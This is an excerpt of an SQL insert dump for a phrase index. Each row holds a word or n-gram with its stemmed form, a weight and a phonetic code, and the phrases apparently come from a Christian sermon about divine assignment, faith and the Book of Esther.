(327030, 'assignment it\'s amazing', 'assign it amazing', 0, 1, 1.7667, 'A25325252', 1, '*'),
(327031, 'assignment on', 'assign on', 0, 1, 1.4333, 'A2535', 1, '*'),
(327032, 'assignment on the', 'assign on the', 0, 1, 1.5667, 'A25353', 1, '*'),
(327033, 'assignment so', 'assign so', 0, 1, 1.4333, 'A2532', 1, '*'),
(327034, 'assignment so you', 'assign so you', 0, 1, 1.5667, 'A2532', 1, '*'),
(327035, 'assignment there', 'assign there', 0, 1, 1.5333, 'A2536', 1, '*'),
(327036, 'assignment there is', 'assign there is', 0, 1, 1.6333, 'A25362', 1, '*'),
(327037, 'assignment understand', 'assign understand', 0, 1, 1.7, 'A2535362353', 1, '*'),
(327038, 'assignment understand that', 'assign understand that', 0, 1, 1.8667, 'A2535362353', 1, '*'),
(327039, 'assisted', 'assist', 0, 0, 0.5333, 'A230', 1, '*'),
(327040, 'assisted life', 'assist life', 0, 1, 1.4333, 'A2341', 1, '*'),
(327041, 'assisted life part', 'assist life part', 0, 1, 1.6, 'A234163', 1, '*'),
(327042, 'at that time', 'at that time', 0, 1, 1.4, 'A350', 1, '*'),
(327043, 'at the king\'s', 'at the king', 0, 1, 1.4333, 'A3252', 1, '*'),
(327044, 'at what is', 'at what is', 0, 1, 1.3333, 'A320', 1, '*'),
(327045, 'at your bank', 'at your bank', 0, 1, 1.4, 'A36152', 1, '*'),
(327046, 'at your job', 'at your job', 0, 1, 1.3667, 'A3621', 1, '*'),
(327047, 'atmosphere where', 'atmospher where', 0, 1, 1.5333, 'A35216', 1, '*'),
(327048, 'atmosphere where jesus', 'atmospher where jesus', 0, 1, 1.7333, 'A352162', 1, '*'),
(327049, 'authority to', 'author to', 0, 1, 1.4, 'A363', 1, '*'),
(327050, 'authority to speak', 'author to speak', 0, 1, 1.6, 'A363212', 1, '*'),
(327051, 'balanced', 'balanc', 0, 0, 0.5333, 'B4523', 1, '*'),
(327052, 'balanced idea', 'balanc idea', 0, 1, 1.4333, 'B4523', 1, '*'),
(327053, 'balanced idea of', 'balanc idea of', 0, 1, 1.5333, 'B45231', 1, '*'),
(327054, 'bank account', 'bank account', 0, 1, 1.4, 'B5253', 1, '*'),
(327055, 'bank account before', 'bank account before', 0, 1, 1.6333, 'B525316', 1, '*'),
(327056, 'be a professional', 'be a professional', 0, 1, 1.5667, 'B61254', 1, '*'),
(327057, 'be born he', 'be born he', 0, 1, 1.3333, 'B650', 1, '*'),
(327058, 'be dormant', 'be dormant', 0, 1, 1.3333, 'B3653', 1, '*'),
(327059, 'be dormant the', 'be dormant the', 0, 1, 1.4667, 'B3653', 1, '*'),
(327060, 'be increasing', 'be increasing', 0, 1, 1.4333, 'B526252', 1, '*'),
(327061, 'be increasing when', 'be increasing when', 0, 1, 1.6, 'B5262525', 1, '*'),
(327062, 'be sensitive about', 'be sensitive about', 0, 1, 1.6, 'B252313', 1, '*'),
(327063, 'be servicing', 'be servicing', 0, 1, 1.4, 'B261252', 1, '*'),
(327064, 'be servicing those', 'be servicing those', 0, 1, 1.6, 'B26125232', 1, '*'),
(327065, 'beautifully', 'beautifulli', 0, 0, 0.7333, 'B314', 1, '*'),
(327066, 'beautifully different', 'beautifulli different', 0, 1, 1.7, 'B31431653', 1, '*'),
(327067, 'beautifully different from', 'beautifulli different from', 0, 1, 1.8667, 'B31431653165', 1, '*'),
(327068, 'because everybody', 'becaus everybody', 0, 1, 1.5667, 'B21613', 1, '*'),
(327069, 'because everybody in', 'becaus everybody in', 0, 1, 1.6667, 'B216135', 1, '*'),
(327070, 'because there are', 'becaus there are', 0, 1, 1.5667, 'B236', 1, '*'),
(327071, 'become queen', 'becom queen', 0, 1, 1.4, 'B2525', 1, '*'),
(327072, 'become queen so', 'becom queen so', 0, 1, 1.5, 'B25252', 1, '*'),
(327073, 'become the queen', 'becom the queen', 0, 1, 1.5333, 'B25325', 1, '*'),
(327074, 'bedience', 'bedienc', 0, 0, 0.5333, 'B352', 1, '*'),
(327075, 'bedience account', 'bedienc account', 0, 1, 1.5333, 'B35253', 1, '*'),
(327076, 'bedience account i', 'bedienc account i', 0, 1, 1.6, 'B35253', 1, '*'),
(327077, 'been prepared', 'been prepared', 0, 1, 1.4333, 'B516163', 1, '*'),
(327078, 'been prepared for', 'been prepared for', 0, 1, 1.5667, 'B51616316', 1, '*'),
(327079, 'been the', 'been the', 0, 1, 1.2667, 'B530', 1, '*'),
(327080, 'been the problem', 'been the problem', 0, 1, 1.5333, 'B5316145', 1, '*'),
(327081, 'been to', 'been to', 0, 1, 1.2333, 'B530', 1, '*'),
(327082, 'been to miss', 'been to miss', 0, 1, 1.4, 'B5352', 1, '*'),
(327083, 'before he tells', 'befor he tells', 0, 1, 1.5, 'B6342', 1, '*'),
(327084, 'before you were', 'befor you were', 0, 1, 1.5, 'B600', 1, '*'),
(327085, 'behalf', 'behalf', 0, 0, 0.4, 'B410', 1, '*'),
(327086, 'behalf but', 'behalf but', 0, 1, 1.3333, 'B413', 1, '*'),
(327087, 'behalf but you', 'behalf but you', 0, 1, 1.4667, 'B413', 1, '*'),
(327088, 'being at', 'be at', 0, 1, 1.2667, 'B523', 1, '*'),
(327089, 'being at the', 'be at the', 0, 1, 1.4, 'B523', 1, '*'),
(327090, 'belong', 'belong', 0, 0, 0.4, 'B452', 1, '*'),
(327091, 'belong to', 'belong to', 0, 1, 1.3, 'B4523', 1, '*'),
(327092, 'belong to the', 'belong to the', 0, 1, 1.4333, 'B4523', 1, '*'),
(327093, 'belongs', 'belong', 0, 0, 0.4667, 'B452', 1, '*'),
(327094, 'belongs to', 'belong to', 0, 1, 1.3333, 'B4523', 1, '*'),
(327095, 'belongs to one', 'belong to one', 0, 1, 1.4667, 'B45235', 1, '*'),
(327096, 'between them', 'between them', 0, 1, 1.4, 'B3535', 1, '*'),
(327097, 'between them is', 'between them is', 0, 1, 1.5, 'B35352', 1, '*'),
(327098, 'beyond the level', 'beyond the level', 0, 1, 1.5333, 'B53414', 1, '*'),
(327099, 'beyond your', 'beyond your', 0, 1, 1.3667, 'B536', 1, '*'),
(327100, 'beyond your faith', 'beyond your faith', 0, 1, 1.5667, 'B53613', 1, '*'),
(327101, 'big ability', 'big ability', 0, 1, 1.3667, 'B2143', 1, '*'),
(327102, 'big ability to', 'big ability to', 0, 1, 1.4667, 'B2143', 1, '*'),
(327103, 'body anointing', 'bodi anointing', 0, 1, 1.4667, 'B35352', 1, '*'),
(327104, 'body anointing account', 'bodi anointing account', 0, 1, 1.7333, 'B3535253', 1, '*'),
(327105, 'body as', 'bodi as', 0, 1, 1.2333, 'B320', 1, '*'),
(327106, 'body as a', 'bodi as a', 0, 1, 1.3, 'B320', 1, '*'),
(327107, 'book of esther', 'book of esther', 0, 1, 1.4667, 'B21236', 1, '*'),
(327108, 'born again certain', 'born again certain', 0, 1, 1.6, 'B65252635', 1, '*'),
(327109, 'born again person', 'born again person', 0, 1, 1.5667, 'B65251625', 1, '*'),
(327110, 'born god', 'born god', 0, 1, 1.2667, 'B6523', 1, '*'),
(327111, 'born god called', 'born god called', 0, 1, 1.5, 'B6523243', 1, '*'),
(327112, 'born he', 'born he', 0, 1, 1.2333, 'B650', 1, '*'),
(327113, 'born he had', 'born he had', 0, 1, 1.3667, 'B653', 1, '*'),
(327114, 'bring cross', 'bring cross', 0, 1, 1.3667, 'B65262', 1, '*'),
(327115, 'bring cross your', 'bring cross your', 0, 1, 1.5333, 'B652626', 1, '*'),
(327116, 'businessman', 'businessman', 0, 0, 0.7333, 'B2525', 1, '*'),
(327117, 'businessman or', 'businessman or', 0, 1, 1.4667, 'B25256', 1, '*'),
(327118, 'businessman or a', 'businessman or a', 0, 1, 1.5333, 'B25256', 1, '*'),
(327119, 'businessman to', 'businessman to', 0, 1, 1.4667, 'B25253', 1, '*'),
(327120, 'businessman to provide', 'businessman to provide', 0, 1, 1.7333, 'B252531613', 1, '*'),
(327121, 'but along', 'but along', 0, 1, 1.3, 'B3452', 1, '*'),
(327122, 'but along these', 'but along these', 0, 1, 1.5, 'B345232', 1, '*'),
(327123, 'but another', 'but another', 0, 1, 1.3667, 'B3536', 1, '*'),
(327124, 'but another person', 'but another person', 0, 1, 1.6, 'B35361625', 1, '*'),
(327125, 'but every', 'but every', 0, 1, 1.3, 'B316', 1, '*'),
(327126, 'but every child', 'but every child', 0, 1, 1.5, 'B316243', 1, '*'),
(327127, 'but he is', 'but he is', 0, 1, 1.3, 'B320', 1, '*'),
(327128, 'but i have', 'but i have', 0, 1, 1.3333, 'B310', 1, '*'),
(327129, 'but if my', 'but if my', 0, 1, 1.3, 'B315', 1, '*'),
(327130, 'but you may', 'but you may', 0, 1, 1.3667, 'B350', 1, '*'),
(327131, 'but you musthave', 'but you musthave', 0, 1, 1.5333, 'B35231', 1, '*'),
(327132, 'buy', 'bui', 0, 0, 0.2, 'B000', 1, '*'),
(327133, 'buy land', 'bui land', 0, 1, 1.2667, 'B453', 1, '*'),
(327134, 'buy land for', 'bui land for', 0, 1, 1.4, 'B45316', 1, '*'),
(327135, 'called me and', 'call me and', 0, 1, 1.4333, 'C4353', 1, '*'),
(327136, 'called you as', 'call you as', 0, 1, 1.4333, 'C432', 1, '*'),
(327137, 'calling account', 'call account', 0, 1, 1.5, 'C45253', 1, '*'),
(327138, 'calling account you', 'call account you', 0, 1, 1.6333, 'C45253', 1, '*'),
(327139, 'calling an', 'call an', 0, 1, 1.3333, 'C4525', 1, '*'),
(327140, 'calling an anointing', 'call an anointing', 0, 1, 1.6667, 'C4525352', 1, '*'),
(327141, 'calling before', 'call before', 0, 1, 1.4667, 'C45216', 1, '*'),
(327142, 'calling before you', 'call before you', 0, 1, 1.6, 'C45216', 1, '*'),
(327143, 'calling easy', 'call easy', 0, 1, 1.4, 'C452', 1, '*'),
(327144, 'calling easy and', 'call easy and', 0, 1, 1.5333, 'C45253', 1, '*'),
(327145, 'calling every', 'call every', 0, 1, 1.4333, 'C45216', 1, '*'),
(327146, 'calling every child', 'call every child', 0, 1, 1.6333, 'C45216243', 1, '*'),
(327147, 'can have generational', 'can have generational', 0, 1, 1.7, 'C51256354', 1, '*'),
(327148, 'can make your', 'can make your', 0, 1, 1.4333, 'C526', 1, '*'),
(327149, 'cannot cast', 'cannot cast', 0, 1, 1.3667, 'C5323', 1, '*'),
(327150, 'cannot cast your', 'cannot cast your', 0, 1, 1.5333, 'C53236', 1, '*'),
(327151, 'capacity to', 'capac to', 0, 1, 1.3667, 'C123', 1, '*'),
(327152, 'capacity to interact', 'capac to interact', 0, 1, 1.6667, 'C12353623', 1, '*'),
(327153, 'car and', 'car and', 0, 1, 1.2333, 'C653', 1, '*'),
(327154, 'car and i', 'car and i', 0, 1, 1.3, 'C653', 1, '*'),
(327155, 'car i', 'car i', 0, 1, 1.1667, 'C600', 1, '*'),
(327156, 'car i had', 'car i had', 0, 1, 1.3, 'C630', 1, '*'),
(327157, 'car to', 'car to', 0, 1, 1.2, 'C630', 1, '*'),
(327158, 'car to do', 'car to do', 0, 1, 1.3, 'C630', 1, '*'),
(327159, 'care ask', 'care ask', 0, 1, 1.2667, 'C620', 1, '*'),
(327160, 'care ask yourself', 'care ask yourself', 0, 1, 1.5667, 'C626241', 1, '*'),
(327161, 'care on', 'care on', 0, 1, 1.2333, 'C650', 1, '*'),
(327162, 'care on the', 'care on the', 0, 1, 1.3667, 'C653', 1, '*'),
(327163, 'care yourself', 'care yourself', 0, 1, 1.4333, 'C6241', 1, '*'),
(327164, 'care yourself it', 'care yourself it', 0, 1, 1.5333, 'C62413', 1, '*'),
(327165, 'carry your', 'carri your', 0, 1, 1.3333, 'C600', 1, '*'),
(327166, 'carry your care', 'carri your care', 0, 1, 1.5, 'C626', 1, '*'),
(327167, 'cast your', 'cast your', 0, 1, 1.3, 'C360', 1, '*'),
(327168, 'cast your care', 'cast your care', 0, 1, 1.4667, 'C3626', 1, '*'),
(327169, 'cast your fear', 'cast your fear', 0, 1, 1.4667, 'C3616', 1, '*'),
(327170, 'cast your knowledge', 'cast your knowledge', 0, 1, 1.6333, 'C3625432', 1, '*'),
(327171, 'certain critical', 'certain critical', 0, 1, 1.5333, 'C63526324', 1, '*'),
(327172, 'certain critical changes', 'certain critical changes', 0, 1, 1.8, 'C63526324252', 1, '*'),
(327173, 'changes took', 'chang took', 0, 1, 1.4, 'C5232', 1, '*'),
(327174, 'changes took place', 'chang took place', 0, 1, 1.6, 'C5232142', 1, '*'),
(327175, 'changes w', 'chang w', 0, 1, 1.3, 'C520', 1, '*'),
(327176, 'changes w isdom', 'chang w isdom', 0, 1, 1.5, 'C5235', 1, '*'),
(327177, 'christ your', 'christ your', 0, 1, 1.3667, 'C6236', 1, '*'),
(327178, 'christ your obedience', 'christ your obedience', 0, 1, 1.7, 'C62361352', 1, '*'),
(327179, 'christian he', 'christian he', 0, 1, 1.4, 'C6235', 1, '*'),
(327180, 'christian he displaced', 'christian he displaced', 0, 1, 1.7333, 'C6235321423', 1, '*'),
(327181, 'clear that', 'clear that', 0, 1, 1.3333, 'C463', 1, '*'),
(327182, 'clear that my', 'clear that my', 0, 1, 1.4333, 'C4635', 1, '*'),
(327183, 'clout', 'clout', 0, 0, 0.3333, 'C430', 1, '*'),
(327184, 'clout and', 'clout and', 0, 1, 1.3, 'C4353', 1, '*'),
(327185, 'clout and authority', 'clout and authority', 0, 1, 1.6333, 'C435363', 1, '*'),
(327186, 'comes in', 'come in', 0, 1, 1.2667, 'C525', 1, '*'),
(327187, 'comes in when', 'come in when', 0, 1, 1.4333, 'C525', 1, '*'),
(327188, 'comfortable for', 'comfort for', 0, 1, 1.5, 'C51631416', 1, '*'),
(327189, 'comfortable for your', 'comfort for your', 0, 1, 1.6667, 'C51631416', 1, '*'),
(327190, 'commitment to', 'commit to', 0, 1, 1.4333, 'C5353', 1, '*'),
(327191, 'commitment to you', 'commit to you', 0, 1, 1.5667, 'C5353', 1, '*'),
(327192, 'commits', 'commit', 0, 0, 0.4667, 'C532', 1, '*'),
(327193, 'commits to', 'commit to', 0, 1, 1.3333, 'C5323', 1, '*'),
(327194, 'commits to your', 'commit to your', 0, 1, 1.5, 'C53236', 1, '*'),
(327195, 'concerned with', 'concern with', 0, 1, 1.4667, 'C52653', 1, '*'),
(327196, 'concerned with the', 'concern with the', 0, 1, 1.6, 'C52653', 1, '*'),
(327197, 'connect to assignment', 'connect to assignment', 0, 1, 1.7, 'C523253', 1, '*'),
(327198, 'consequences', 'consequ', 0, 0, 0.8, 'C5252', 1, '*'),
(327199, 'consequences all', 'consequ all', 0, 1, 1.5333, 'C52524', 1, '*'),
(327200, 'consequences all these', 'consequ all these', 0, 1, 1.7333, 'C5252432', 1, '*'),
(327201, 'correctly and', 'correctli and', 0, 1, 1.4333, 'C623453', 1, '*'),
(327202, 'correctly and when', 'correctli and when', 0, 1, 1.6, 'C6234535', 1, '*'),
(327203, 'could enter', 'could enter', 0, 1, 1.3667, 'C43536', 1, '*'),
(327204, 'could enter the', 'could enter the', 0, 1, 1.5, 'C435363', 1, '*'),
(327205, 'could fulfill', 'could fulfill', 0, 1, 1.4333, 'C431414', 1, '*'),
(327206, 'could fulfill his', 'could fulfill his', 0, 1, 1.5667, 'C4314142', 1, '*'),
(327207, 'could grow', 'could grow', 0, 1, 1.3333, 'C4326', 1, '*'),
(327208, 'could grow up', 'could grow up', 0, 1, 1.4333, 'C43261', 1, '*'),
(327209, 'counter', 'counter', 0, 0, 0.4667, 'C536', 1, '*'),
(327210, 'counter haman\'s', 'counter haman', 0, 1, 1.5, 'C53652', 1, '*'),
(327211, 'counter haman\'s plot', 'counter haman plot', 0, 1, 1.6667, 'C53652143', 1, '*'),
(327212, 'crazy', 'crazi', 0, 0, 0.3333, 'C620', 1, '*'),
(327213, 'crazy if', 'crazi if', 0, 1, 1.2667, 'C621', 1, '*'),
(327214, 'crazy if i', 'crazi if i', 0, 1, 1.3333, 'C621', 1, '*'),
(327215, 'critical changes', 'critic changes', 0, 1, 1.5333, 'C6324252', 1, '*'),
(327216, 'critical changes took', 'critic changes took', 0, 1, 1.7, 'C632425232', 1, '*'),
(327217, 'cross your', 'cross your', 0, 1, 1.3333, 'C626', 1, '*'),
(327218, 'cross your path', 'cross your path', 0, 1, 1.5, 'C62613', 1, '*'),
(327219, 'currently', 'current', 0, 0, 0.6, 'C6534', 1, '*'),
(327220, 'currently doing', 'current doing', 0, 1, 1.5, 'C6534352', 1, '*'),
(327221, 'currently doing and', 'current doing and', 0, 1, 1.6333, 'C653435253', 1, '*'),
(327222, 'd e', 'd e', 0, 1, 1.1, 'D000', 1, '*'),
(327223, 'd e nti', 'd e nti', 0, 1, 1.2333, 'D530', 1, '*'),
(327224, 'deliberate purposeful', 'deliber purposeful', 0, 1, 1.7, 'D4163161214', 1, '*'),
(327225, 'deliberate purposeful timed', 'deliber purposeful timed', 0, 1, 1.9, 'D4163161214353', 1, '*'),
(327226, 'deliver israel', 'deliv israel', 0, 1, 1.4667, 'D416264', 1, '*'),
(327227, 'deliver israel would', 'deliv israel would', 0, 1, 1.6667, 'D4162643', 1, '*'),
(327228, 'designed arrival', 'design arrival', 0, 1, 1.5333, 'D253614', 1, '*'),
(327229, 'designed arrival when', 'design arrival when', 0, 1, 1.7, 'D2536145', 1, '*'),
(327230, 'destiny and they', 'destini and they', 0, 1, 1.5333, 'D2353', 1, '*'),
(327231, 'destiny god', 'destini god', 0, 1, 1.3667, 'D23523', 1, '*'),
(327232, 'destiny god made', 'destini god made', 0, 1, 1.5333, 'D2352353', 1, '*'),
(327233, 'devil has never', 'devil has never', 0, 1, 1.5, 'D142516', 1, '*'),
(327234, 'devil that was', 'devil that was', 0, 1, 1.4667, 'D1432', 1, '*'),
(327235, 'did not require', 'did not require', 0, 1, 1.5, 'D53626', 1, '*'),
(327236, 'died and', 'di and', 0, 1, 1.2667, 'D530', 1, '*'),
(327237, 'died and god', 'di and god', 0, 1, 1.4, 'D5323', 1, '*'),
(327238, 'different accounts', 'differ accounts', 0, 1, 1.6, 'D16532532', 1, '*'),
(327239, 'different accounts t', 'differ accounts t', 0, 1, 1.6667, 'D165325323', 1, '*'),
(327240, 'different from every', 'differ from every', 0, 1, 1.6667, 'D165316516', 1, '*'),
(327241, 'different from one', 'differ from one', 0, 1, 1.6, 'D1653165', 1, '*'),
(327242, 'different reasons', 'differ reasons', 0, 1, 1.5667, 'D16536252', 1, '*'),
(327243, 'different reasons and', 'differ reasons and', 0, 1, 1.7, 'D1653625253', 1, '*'),
(327244, 'directions of', 'direct of', 0, 1, 1.4333, 'D623521', 1, '*'),
(327245, 'directions of god', 'direct of god', 0, 1, 1.5667, 'D62352123', 1, '*'),
(327246, 'discipleship comes', 'discipleship comes', 0, 1, 1.6, 'D21421252', 1, '*'),
(327247, 'discipleship comes in', 'discipleship comes in', 0, 1, 1.7, 'D214212525', 1, '*'),
(327248, 'disciplines', 'disciplin', 0, 0, 0.7333, 'D21452', 1, '*'),
(327249, 'disciplines of', 'disciplin of', 0, 1, 1.4667, 'D214521', 1, '*'),
(327250, 'disciplines of the', 'disciplin of the', 0, 1, 1.6, 'D2145213', 1, '*'),
(327251, 'disobedience can', 'disobedi can', 0, 1, 1.5333, 'D213525', 1, '*'),
(327252, 'disobedience can have', 'disobedi can have', 0, 1, 1.7, 'D2135251', 1, '*'),
(327253, 'disobeyed the', 'disobei the', 0, 1, 1.4333, 'D213', 1, '*'),
(327254, 'disobeyed the directions', 'disobei the directions', 0, 1, 1.8, 'D21362352', 1, '*'),
(327255, 'displaced', 'displac', 0, 0, 0.6, 'D21423', 1, '*'),
(327256, 'displaced vashti', 'displac vashti', 0, 1, 1.5333, 'D21423123', 1, '*'),
(327257, 'displaced vashti and', 'displac vashti and', 0, 1, 1.6667, 'D2142312353', 1, '*'),
(327258, 'distinguish', 'distinguish', 0, 0, 0.7333, 'D2352', 1, '*'),
(327259, 'distinguish between', 'distinguish between', 0, 1, 1.6333, 'D2352135', 1, '*'),
(327260, 'distinguish between them', 'distinguish between them', 0, 1, 1.8, 'D235213535', 1, '*'),
(327261, 'divine assignment', 'divin assignment', 0, 1, 1.5667, 'D15253', 1, '*'),
(327262, 'divine assignment assignment', 'divin assignment assignment', 0, 1, 1.9333, 'D15253253', 1, '*'),
(327263, 'divine commitment', 'divin commitment', 0, 1, 1.5667, 'D1525353', 1, '*'),
(327264, 'divine commitment to', 'divin commitment to', 0, 1, 1.6667, 'D1525353', 1, '*'),
(327265, 'divine provision', 'divin provision', 0, 1, 1.5333, 'D1516125', 1, '*'),
(327266, 'divine provision for', 'divin provision for', 0, 1, 1.6667, 'D151612516', 1, '*'),
(327267, 'divinely assisted', 'divin assisted', 0, 1, 1.5667, 'D15423', 1, '*'),
(327268, 'divinely assisted life', 'divin assisted life', 0, 1, 1.7333, 'D1542341', 1, '*'),
(327269, 'do but i', 'do but i', 0, 1, 1.2667, 'D130', 1, '*'),
(327270, 'do it whether', 'do it whether', 0, 1, 1.4333, 'D600', 1, '*'),
(327271, 'do not see', 'do not see', 0, 1, 1.3333, 'D532', 1, '*'),
(327272, 'do so and', 'do so and', 0, 1, 1.3, 'D253', 1, '*'),
(327273, 'do something for', 'do something for', 0, 1, 1.5333, 'D2535216', 1, '*'),
(327274, 'do something he', 'do something he', 0, 1, 1.5, 'D25352', 1, '*'),
(327275, 'does not have', 'doe not have', 0, 1, 1.4333, 'D2531', 1, '*'),
(327276, 'does that', 'doe that', 0, 1, 1.3, 'D230', 1, '*'),
(327277, 'does that help', 'doe that help', 0, 1, 1.4667, 'D2341', 1, '*'),
(327278, 'doing and', 'do and', 0, 1, 1.3, 'D5253', 1, '*'),
(327279, 'doing and labouring', 'do and labouring', 0, 1, 1.6333, 'D525341652', 1, '*'),
(327280, 'don\'t connect', 'don connect', 0, 1, 1.4333, 'D532523', 1, '*'),
(327281, 'don\'t connect to', 'don connect to', 0, 1, 1.5333, 'D532523', 1, '*'),
(327282, 'don\'t forget', 'don forget', 0, 1, 1.4, 'D531623', 1, '*'),
(327283, 'don\'t forget that', 'don forget that', 0, 1, 1.5667, 'D531623', 1, '*'),
(327284, 'don\'t have any', 'don have any', 0, 1, 1.4667, 'D5315', 1, '*'),
(327285, 'dormant the', 'dormant the', 0, 1, 1.3667, 'D653', 1, '*'),
(327286, 'dormant the devil', 'dormant the devil', 0, 1, 1.5667, 'D65314', 1, '*'),
(327287, 'down and do', 'down and do', 0, 1, 1.3667, 'D530', 1, '*'),
(327288, 'duty don\'t', 'duti don', 0, 1, 1.3333, 'D530', 1, '*'),
(327289, 'duty don\'t forget', 'duti don forget', 0, 1, 1.5667, 'D531623', 1, '*'),
(327290, 'e nti', 'e nti', 0, 1, 1.1667, 'E530', 1, '*'),
(327291, 'e nti f', 'e nti f', 0, 1, 1.2333, 'E531', 1, '*'),
(327292, 'each of', 'each of', 0, 1, 1.2333, 'E210', 1, '*'),
(327293, 'each of the', 'each of the', 0, 1, 1.3667, 'E213', 1, '*'),
(327294, 'earth requires', 'earth requires', 0, 1, 1.4667, 'E636262', 1, '*'),
(327295, 'earth requires that', 'earth requires that', 0, 1, 1.6333, 'E6362623', 1, '*'),
(327296, 'earth we', 'earth we', 0, 1, 1.2667, 'E630', 1, '*'),
(327297, 'earth we are', 'earth we are', 0, 1, 1.4, 'E636', 1, '*'),
(327298, 'easy and', 'easi and', 0, 1, 1.2667, 'E253', 1, '*'),
(327299, 'easy and walkable', 'easi and walkable', 0, 1, 1.5667, 'E2534214', 1, '*'),
(327300, 'enter the', 'enter the', 0, 1, 1.3, 'E5363', 1, '*'),
(327301, 'enter the ministry', 'enter the ministry', 0, 1, 1.6, 'E53635236', 1, '*'),
(327302, 'error once', 'error once', 0, 1, 1.3333, 'E652', 1, '*'),
(327303, 'error once told', 'error once told', 0, 1, 1.5, 'E652343', 1, '*'),
(327304, 'essence', 'essenc', 0, 0, 0.4667, 'E252', 1, '*'),
(327305, 'essence saying', 'essenc saying', 0, 1, 1.4667, 'E25252', 1, '*'),
(327306, 'essence saying “it', 'essenc saying “it', 0, 1, 1.6, 'E252523', 1, '*'),
(327307, 'esther 4', 'esther 4', 0, 1, 1.2667, 'E236', 1, '*'),
(327308, 'esther 4 14', 'esther 4 14', 0, 1, 1.3667, 'E236', 1, '*'),
(327309, 'esther beautifully', 'esther beautifully', 0, 1, 1.6, 'E2361314', 1, '*'),
(327310, 'esther beautifully different', 'esther beautifully different', 0, 1, 1.9333, 'E236131431653', 1, '*'),
(327311, 'esther she', 'esther she', 0, 1, 1.3333, 'E2362', 1, '*'),
(327312, 'esther she had', 'esther she had', 0, 1, 1.4667, 'E23623', 1, '*'),
(327313, 'esther there', 'esther there', 0, 1, 1.4, 'E23636', 1, '*'),
(327314, 'esther there who', 'esther there who', 0, 1, 1.5333, 'E23636', 1, '*'),
(327315, 'every born', 'everi born', 0, 1, 1.3333, 'E16165', 1, '*'),
(327316, 'every born again', 'everi born again', 0, 1, 1.5333, 'E1616525', 1, '*'),
(327317, 'every child', 'everi child', 0, 1, 1.3667, 'E16243', 1, '*'),
(327318, 'every child of', 'everi child of', 0, 1, 1.4667, 'E162431', 1, '*'),
(327319, 'every other girl', 'everi other girl', 0, 1, 1.5333, 'E1636264', 1, '*'),
(327320, 'everybody in', 'everybodi in', 0, 1, 1.4, 'E16135', 1, '*'),
(327321, 'everybody in your', 'everybodi in your', 0, 1, 1.5667, 'E161356', 1, '*'),
(327322, 'except the', 'except the', 0, 1, 1.3333, 'E213', 1, '*'),
(327323, 'except the one', 'except the one', 0, 1, 1.4667, 'E2135', 1, '*'),
(327324, 'f', 'f', 0, 0, 0.0667, 'F000', 1, '*'),
(327325, 'f aith', 'f aith', 0, 1, 1.2, 'F300', 1, '*'),
(327326, 'f aith account', 'f aith account', 0, 1, 1.4667, 'F3253', 1, '*'),
(327327, 'f y', 'f y', 0, 1, 1.1, 'F000', 1, '*'),
(327328, 'f y the', 'f y the', 0, 1, 1.2333, 'F300', 1, '*'),
(327329, 'facilitate', 'facilit', 0, 0, 0.6667, 'F243', 1, '*'),
(327330, 'facilitate the', 'facilit the', 0, 1, 1.4667, 'F243', 1, '*'),
(327331, 'facilitate the salvation', 'facilit the salvation', 0, 1, 1.8, 'F24324135', 1, '*'),
(327332, 'faith grows', 'faith grows', 0, 1, 1.3667, 'F3262', 1, '*'),
(327333, 'faith grows the', 'faith grows the', 0, 1, 1.5, 'F32623', 1, '*'),
(327334, 'faith is low', 'faith is low', 0, 1, 1.4, 'F324', 1, '*'),
(327335, 'faith or', 'faith or', 0, 1, 1.2667, 'F360', 1, '*'),
(327336, 'faith or more', 'faith or more', 0, 1, 1.4333, 'F3656', 1, '*'),
(327337, 'faith or the', 'faith or the', 0, 1, 1.4, 'F363', 1, '*'),
(327338, 'faith to cast', 'faith to cast', 0, 1, 1.4333, 'F323', 1, '*'),
(327339, 'faith to fuel', 'faith to fuel', 0, 1, 1.4333, 'F314', 1, '*'),
(327340, 'faith understand', 'faith understand', 0, 1, 1.5333, 'F35362353', 1, '*'),
(327341, 'faith understand that', 'faith understand that', 0, 1, 1.7, 'F35362353', 1, '*'),
(327342, 'faith you do', 'faith you do', 0, 1, 1.4, 'F300', 1, '*'),
(327343, 'faith you don\'t', 'faith you don', 0, 1, 1.5, 'F353', 1, '*'),
(327344, 'faith you have', 'faith you have', 0, 1, 1.4667, 'F310', 1, '*'),
(327345, 'father died', 'father died', 0, 1, 1.3667, 'F363', 1, '*'),
(327346, 'father died and', 'father died and', 0, 1, 1.5, 'F36353', 1, '*'),
(327347, 'fear upon', 'fear upon', 0, 1, 1.3, 'F615', 1, '*'),
(327348, 'fear upon god', 'fear upon god', 0, 1, 1.4333, 'F61523', 1, '*'),
(327349, 'feebleness', 'feebl', 0, 0, 0.6667, 'F452', 1, '*'),
(327350, 'feebleness of', 'feebl of', 0, 1, 1.4333, 'F4521', 1, '*'),
(327351, 'feebleness of our', 'feebl of our', 0, 1, 1.5667, 'F45216', 1, '*'),
(327352, 'find that assignment', 'find that assignment', 0, 1, 1.6667, 'F53253', 1, '*'),
(327353, 'find your', 'find your', 0, 1, 1.3, 'F536', 1, '*'),
(327354, 'find your assignment', 'find your assignment', 0, 1, 1.6667, 'F536253', 1, '*'),
(327355, 'foolish christian', 'foolish christian', 0, 1, 1.5667, 'F426235', 1, '*'),
(327356, 'foolish christian he', 'foolish christian he', 0, 1, 1.6667, 'F426235', 1, '*'),
(327357, 'foolish sinner', 'foolish sinner', 0, 1, 1.4667, 'F4256', 1, '*'),
(327358, 'foolish sinner and', 'foolish sinner and', 0, 1, 1.6, 'F425653', 1, '*'),
(327359, 'foot', 'foot', 0, 0, 0.2667, 'F300', 1, '*'),
(327360, 'foot how', 'foot how', 0, 1, 1.2667, 'F300', 1, '*'),
(327361, 'foot how does', 'foot how does', 0, 1, 1.4333, 'F320', 1, '*'),
(327362, 'for 35', 'for 35', 0, 1, 1.2, 'F600', 1, '*'),
(327363, 'for 35 years', 'for 35 years', 0, 1, 1.4, 'F620', 1, '*'),
(327364, 'for a purpose', 'for a purpose', 0, 1, 1.4333, 'F61612', 1, '*'),
(327365, 'for different', 'for different', 0, 1, 1.4333, 'F631653', 1, '*'),
(327366, 'for different reasons', 'for different reasons', 0, 1, 1.7, 'F6316536252', 1, '*'),
(327367, 'for esther', 'for esther', 0, 1, 1.3333, 'F6236', 1, '*'),
(327368, 'for esther she', 'for esther she', 0, 1, 1.4667, 'F62362', 1, '*'),
(327369, 'for for', 'for for', 0, 1, 1.2333, 'F616', 1, '*'),
(327370, 'for for esther', 'for for esther', 0, 1, 1.4667, 'F616236', 1, '*'),
(327371, 'for giving', 'for giving', 0, 1, 1.3333, 'F62152', 1, '*'),
